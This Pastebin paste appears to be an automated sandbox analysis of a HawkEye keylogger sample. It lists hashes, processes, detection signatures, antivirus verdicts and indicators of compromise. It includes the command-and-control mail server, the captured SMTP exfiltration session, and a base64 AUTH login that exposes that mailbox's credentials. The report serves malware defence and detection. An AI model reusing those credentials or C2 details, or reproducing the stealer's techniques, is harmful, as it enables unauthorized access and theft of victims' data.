API tools faq
paste
Advertisement
paladin316

Exes_b0344c3414f8b69a1521bbf9b2f8dc03_exe_2019-07-22_15_30.txt

paladin316
Jul 22nd, 2019
1,370
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.91 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * MalFamily: "Hawkeye"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_b0344c3414f8b69a1521bbf9b2f8dc03.exe"
  7. * File Size: 1966080
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "8809285aa66e339412f6b4d85eee558726ffe6fedf7e203e4a87f14051a1b83d"
  10. * MD5: "b0344c3414f8b69a1521bbf9b2f8dc03"
  11. * SHA1: "4d87bf9b8eedc5b30da17857d5f331f0cac4c41a"
  12. * SHA512: "0c2ce03461b8852fea7fece0fd15438403b0d0fb699e0ccbe3d22323f400be79ce387dd24be8d8831a9158cdfd26e8e8b1266eff616cbed32429a33892a291e2"
  13. * CRC32: "3B25A673"
  14. * SSDEEP: "49152:Ph+ZkldoPK8YaGsSYmB/s38eAIJ00enVtU5PBV:Y2cPK8EYmB/CknED"
  15.  
  16. * Process Execution:
  17. "Exes_b0344c3414f8b69a1521bbf9b2f8dc03.exe",
  18. "RegAsm.exe",
  19. "vbc.exe",
  20. "vbc.exe",
  21. "vbc.exe",
  22. "vbc.exe",
  23. "vbc.exe",
  24. "services.exe",
  25. "svchost.exe",
  26. "WmiPrvSE.exe",
  27. "WmiPrvSE.exe",
  28. "lsass.exe",
  29. "taskhost.exe",
  30. "lsass.exe",
  31. "WMIADAP.exe"
  32.  
  33.  
  34. * Executed Commands:
  35. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpBC21.tmp\"",
  36. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpEB1D.tmp\"",
  37. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpE59B.tmp\"",
  38. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpFE01.tmp\"",
  39. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpF524.tmp\"",
  40. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  41. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  42. "C:\\Windows\\system32\\lsass.exe"
  43.  
  44.  
  45. * Signatures Detected:
  46.  
  47. "Description": "Creates RWX memory",
  48. "Details":
  49.  
  50.  
  51. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  52. "Details":
  53.  
  54. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  55.  
  56.  
  57. "suspicious_request": "http://bot.whatismyipaddress.com/"
  58.  
  59.  
  60.  
  61.  
  62. "Description": "Performs some HTTP requests",
  63. "Details":
  64.  
  65. "url": "http://bot.whatismyipaddress.com/"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "The binary likely contains encrypted or compressed data.",
  71. "Details":
  72.  
  73. "section": "name: .rsrc, entropy: 7.98, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00115a00, virtual_size: 0x00115988"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "Looks up the external IP address",
  79. "Details":
  80.  
  81. "domain": "bot.whatismyipaddress.com"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "Executed a process and injected code into it, probably while unpacking",
  87. "Details":
  88.  
  89. "Injection": "Exes_b0344c3414f8b69a1521bbf9b2f8dc03.exe(1840) -> RegAsm.exe(2936)"
  90.  
  91.  
  92.  
  93.  
  94. "Description": "Sniffs keystrokes",
  95. "Details":
  96.  
  97. "SetWindowsHookExA": "Process: RegAsm.exe(2936)"
  98.  
  99.  
  100.  
  101.  
  102. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  103. "Details":
  104.  
  105. "Process": "RegAsm.exe tried to sleep 2607 seconds, actually delayed analysis time by 0 seconds"
  106.  
  107.  
  108.  
  109.  
  110. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  111. "Details":
  112.  
  113. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 15051955 times"
  114.  
  115.  
  116.  
  117.  
  118. "Description": "Exhibits behavior characteristics of HawkEye keylogger.",
  119. "Details":
  120.  
  121. "Host": "192.185.113.100:587"
  122.  
  123.  
  124. "Hostname": "mail.renowncontainerlines.com"
  125.  
  126.  
  127. "SMTP_Auth_Email": "shobha@renowncontainerlines.com"
  128.  
  129.  
  130. "SMTP_Mail_From": "<shobha@renowncontainerlines.com>"
  131.  
  132.  
  133. "SMTP_Send_To": "<shobha@renowncontainerlines.com>"
  134.  
  135.  
  136.  
  137.  
  138. "Description": "Steals private information from local Internet browsers",
  139. "Details":
  140.  
  141. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  142.  
  143.  
  144. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  145.  
  146.  
  147. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat"
  148.  
  149.  
  150.  
  151.  
  152. "Description": "Exhibits behavior characteristic of iSpy Keylogger",
  153. "Details":
  154.  
  155. "C2": "192.185.113.100"
  156.  
  157.  
  158. "C2": "mail.renowncontainerlines.com"
  159.  
  160.  
  161.  
  162.  
  163. "Description": "File has been identified by 29 Antiviruses on VirusTotal as malicious",
  164. "Details":
  165.  
  166. "MicroWorld-eScan": "Trojan.Agent.EATP"
  167.  
  168.  
  169. "FireEye": "Generic.mg.b0344c3414f8b69a"
  170.  
  171.  
  172. "Cylance": "Unsafe"
  173.  
  174.  
  175. "Arcabit": "Trojan.Agent.EATP"
  176.  
  177.  
  178. "Invincea": "heuristic"
  179.  
  180.  
  181. "F-Prot": "W32/AutoIt.IJ.gen!Eldorado"
  182.  
  183.  
  184. "Symantec": "ML.Attribute.HighConfidence"
  185.  
  186.  
  187. "APEX": "Malicious"
  188.  
  189.  
  190. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  191.  
  192.  
  193. "BitDefender": "Trojan.Agent.EATP"
  194.  
  195.  
  196. "Tencent": "Win32.Trojan.Inject.Auto"
  197.  
  198.  
  199. "Endgame": "malicious (high confidence)"
  200.  
  201.  
  202. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.tc"
  203.  
  204.  
  205. "Emsisoft": "Trojan.Agent.EATP (B)"
  206.  
  207.  
  208. "SentinelOne": "DFI - Suspicious PE"
  209.  
  210.  
  211. "Cyren": "W32/AutoIt.IJ.gen!Eldorado"
  212.  
  213.  
  214. "MAX": "malware (ai score=83)"
  215.  
  216.  
  217. "Antiy-AVL": "Trojan/Generic.ASVCS3S.1E5"
  218.  
  219.  
  220. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  221.  
  222.  
  223. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  224.  
  225.  
  226. "GData": "Trojan.Agent.EATP (2x)"
  227.  
  228.  
  229. "AhnLab-V3": "Malware/Win32.RL_Trojan.R280776"
  230.  
  231.  
  232. "Acronis": "suspicious"
  233.  
  234.  
  235. "ALYac": "Trojan.Agent.EATP"
  236.  
  237.  
  238. "Ad-Aware": "Trojan.Agent.EATP"
  239.  
  240.  
  241. "ESET-NOD32": "a variant of Win32/Injector.Autoit.EDR"
  242.  
  243.  
  244. "Rising": "Trojan.Win32.Agent_.sa (CLASSIC)"
  245.  
  246.  
  247. "Cybereason": "malicious.b8eedc"
  248.  
  249.  
  250. "Qihoo-360": "HEUR/QVM10.1.AF9F.Malware.Gen"
  251.  
  252.  
  253.  
  254.  
  255. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  256. "Details":
  257.  
  258.  
  259. "Description": "Harvests information related to installed instant messenger clients",
  260. "Details":
  261.  
  262. "key": "HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts"
  263.  
  264.  
  265.  
  266.  
  267. "Description": "Harvests information related to installed mail clients",
  268. "Details":
  269.  
  270. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.oeaccount"
  271.  
  272.  
  273. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.*"
  274.  
  275.  
  276. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles"
  277.  
  278.  
  279. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  280.  
  281.  
  282. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  283.  
  284.  
  285. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP User"
  286.  
  287.  
  288. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  289.  
  290.  
  291. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  292.  
  293.  
  294. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  295.  
  296.  
  297. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP User"
  298.  
  299.  
  300. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  301.  
  302.  
  303. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  304.  
  305.  
  306. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  307.  
  308.  
  309. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  310.  
  311.  
  312. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  313.  
  314.  
  315. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP User"
  316.  
  317.  
  318. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  319.  
  320.  
  321. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  322.  
  323.  
  324. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP User"
  325.  
  326.  
  327. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  328.  
  329.  
  330. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP User"
  331.  
  332.  
  333. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  334.  
  335.  
  336. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User"
  337.  
  338.  
  339. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User"
  340.  
  341.  
  342. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  343.  
  344.  
  345. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  346.  
  347.  
  348. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  349.  
  350.  
  351. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP User"
  352.  
  353.  
  354. "key": "HKEY_CURRENT_USER\\Identities\\0A258175-2D14-4D69-9955-E200F247250F\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
  355.  
  356.  
  357. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
  358.  
  359.  
  360. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  361.  
  362.  
  363. "key": "HKEY_CURRENT_USER\\Identities\\0A258175-2D14-4D69-9955-E200F247250F\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  364.  
  365.  
  366.  
  367.  
  368. "Description": "Makes SMTP requests, possibly sending spam or exfiltrating data.",
  369. "Details":
  370.  
  371. "SMTP": "192.185.113.100 (mail.renowncontainerlines.com)"
  372.  
  373.  
  374.  
  375.  
  376. "Description": "Anomalous binary characteristics",
  377. "Details":
  378.  
  379. "anomaly": "Actual checksum does not match that reported in PE header"
  380.  
  381.  
  382.  
  383.  
  384. "Description": "Created network traffic indicative of malicious activity",
  385. "Details":
  386.  
  387. "signature": "ET TROJAN Hawkeye Keylogger SMTP Beacon"
  388.  
  389.  
  390.  
  391.  
  392.  
  393. * Started Service:
  394. "VaultSvc"
  395.  
  396.  
  397. * Mutexes:
  398. "Global\\CLR_CASOFF_MUTEX",
  399. "a0afcf2e-81ce-4efb-9585-0bb9e57c9fab",
  400. "Global\\.net clr networking",
  401. "CicLoadWinStaWinSta0",
  402. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  403. "Global\\ADAP_WMI_ENTRY",
  404. "Global\\RefreshRA_Mutex",
  405. "Global\\RefreshRA_Mutex_Lib",
  406. "Global\\RefreshRA_Mutex_Flag"
  407.  
  408.  
  409. * Modified Files:
  410. "C:\\Users\\user\\AppData\\Local\\Temp\\e7595cac-762a-e381-a64b-a9c703513bf3",
  411. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  412. "\\??\\WMIDataDevice",
  413. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data",
  414. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
  415. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpBC21.tmp",
  416. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  417. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpEB1D.tmp",
  418. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpE59B.tmp",
  419. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpFE01.tmp",
  420. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h",
  421. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpF524.tmp"
  422.  
  423.  
  424. * Deleted Files:
  425. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpBC21.tmp",
  426. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpEB1D.tmp",
  427. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpE59B.tmp",
  428. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpFE01.tmp"
  429.  
  430.  
  431. * Modified Registry Keys:
  432. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\RegAsm_RASAPI32",
  433. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\EnableFileTracing",
  434. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\EnableConsoleTracing",
  435. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\FileTracingMask",
  436. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\ConsoleTracingMask",
  437. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\MaxFileSize",
  438. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\FileDirectory",
  439. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
  440. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  441. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
  442. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
  443. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
  444. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
  445. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
  446. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
  447. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
  448. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
  449. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
  450. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
  451. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
  452. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
  453. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
  454. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
  455. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
  456. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  457.  
  458.  
  459. * Deleted Registry Keys:
  460. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  461.  
  462.  
  463. * DNS Communications:
  464.  
  465. "type": "A",
  466. "request": "bot.whatismyipaddress.com",
  467. "answers":
  468.  
  469. "data": "66.171.248.178",
  470. "type": "A"
  471.  
  472.  
  473.  
  474.  
  475. "type": "A",
  476. "request": "mail.renowncontainerlines.com",
  477. "answers":
  478.  
  479. "data": "192.185.113.100",
  480. "type": "A"
  481.  
  482.  
  483.  
  484.  
  485.  
  486. * Domains:
  487.  
  488. "ip": "66.171.248.178",
  489. "domain": "bot.whatismyipaddress.com"
  490.  
  491.  
  492. "ip": "192.185.113.100",
  493. "domain": "mail.renowncontainerlines.com"
  494.  
  495.  
  496.  
  497. * Network Communication - ICMP:
  498.  
  499. * Network Communication - HTTP:
  500.  
  501. "count": 1,
  502. "body": "",
  503. "uri": "http://bot.whatismyipaddress.com/",
  504. "user-agent": "",
  505. "method": "GET",
  506. "host": "bot.whatismyipaddress.com",
  507. "version": "1.1",
  508. "path": "/",
  509. "data": "GET / HTTP/1.1\r\nHost: bot.whatismyipaddress.com\r\nConnection: Keep-Alive\r\n\r\n",
  510. "port": 80
  511.  
  512.  
  513.  
  514. * Network Communication - SMTP:
  515.  
  516. "raw": "EHLO Host\r\nAUTH login c2hvYmhhQHJlbm93bmNvbnRhaW5lcmxpbmVzLmNvbQ==\r\nc2hvYiNyZW4=\r\nMAIL FROM:<shobha@renowncontainerlines.com>\r\nRCPT TO:<shobha@renowncontainerlines.com>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: shobha@renowncontainerlines.com\r\nTo: shobha@renowncontainerlines.com\r\nDate: 22 Jul 2019 11:52:05 -0700\r\nSubject: =?utf-8?B?SGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkgLSBDbGlwYm9hcmQgTG9ncyAtIHNidSBcIFNCVVc3WDY0IC0gMTcyLjgzLjQwLjEwOQ==?=\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Transfer-Encoding: base64\r\n\r\nSGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkNCkNsaXBib2FyZCBMb2dzDQpzYnUgXCBT\r\nQlVXN1g2NA0KDQoNCg0KPT09PT09PT09PT09PTExOjQwIEFNIFByb2dyYW0gTWFuYWdlcj09\r\nPT09PT09PT09PT0NCg0KYXVtYWVubmF3cmF3d3JhaXJhaGdyb3N0bWV0b2Vic21hbiBtIGVh\r\nZGRlbG5vZXd5ZW90b3RsaGljY2Jld3JvZ29zZSAgZXJnbnV5YW55ZWV0YmxoaHNzaWwgbmZo\r\nY2F0aGV1IHRiYW8gdW9scmllcnJ0b3NlZWVvZWRoaW9ocmlubXJyZmJvc2lpdHlhdHVoYWdz\r\nIHNoYSBnZGxkd3dsZWQgZXVvY2RlYWxnIHVldHJhYXJ0IGxvcmkgaWNlcCBlb3NpIGFsaGhj\r\nbmVhc3NvaW1zaG9nYXdvdSBleWFldHR0b3l0cnMgd3VlcmJlc2FpaWVuZG1zaGRvcnJpc2Rl\r\nY3dydXRuZWR0ZW9kaHJudGF0aHQgaXl3ZW9pIGVhIGN0dGVjb255Ymlnb3Rzd21vY2Fuc3Jp\r\nIG9lcnJoaGVkaW9vIGhlbW1ob2N0dGlveXl0YnMgbHNkZSB5Z2VhZW5sYWV1ZXNydW5lb3Ju\r\ndHBpbWVuY3RpcnMgZnRocmxpZHdvZW9kaGRmdHIgZmhtdWFoIGl0bG5vYWllb2hpb2hlaWV0\r\nZWZnIGVvcGVtZCByc3dmcmVhYXRhYmhhZWVzaG9jYWVoZWVoIGF0c29zb2kgbyB5ZWRzdGZl\r\nIGFodWMgZWllZGVlb2NuZWJjaWNhc2YgIGVhYXR1aGhlbmVkb3VzbHRpYW9kdHRyZWFzdWQg\r\ndGxyb2lpb253c2RtYnMgbml3bnRhaGVuZG5jIG9pZWVlYXRvZXV0ZWMgcGlzbmlhaW9ldWFt\r\nb2hvZXVtICBhbW5ldWV0aG9zdG5ycyBvaG9udHRlYnJhYWVvZ2xtZHRpZW9ueW9y\r\n\r\n.\r\n",
  517. "dst": "192.185.113.100"
  518.  
  519.  
  520.  
  521. * Network Communication - Hosts:
  522.  
  523. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!